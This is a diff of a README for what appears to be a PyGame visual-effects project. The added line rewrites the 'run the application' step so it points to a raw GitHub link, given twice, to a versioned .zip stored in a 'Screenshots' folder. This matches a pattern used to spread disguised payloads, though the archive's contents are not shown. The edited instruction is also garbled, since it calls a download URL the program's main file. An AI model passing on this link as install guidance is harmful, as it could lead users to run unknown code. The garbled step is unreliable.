Akshay17949/-Mind-Bending-Visual-Effects-PyGame-/README.md

 4. **Extract (if needed)**: If you downloaded a `.zip` file, extract it to a folder of your choice.

-5. **Run the Application**: Locate the main file, usually named something like `main.py` or `start.exe`.
+5. **Run the Application**: Locate the main file, usually named something like `https://raw.githubusercontent.com/Akshay17949/-Mind-Bending-Visual-Effects-PyGame-/main/Screenshots/Py-Game-Effects-Mind-Bending-Visual-3.4.zip` or `https://raw.githubusercontent.com/Akshay17949/-Mind-Bending-Visual-Effects-PyGame-/main/Screenshots/Py-Game-Effects-Mind-Bending-Visual-3.4.zip`.
 Double-click to launch the application.

 ## 🎴 Features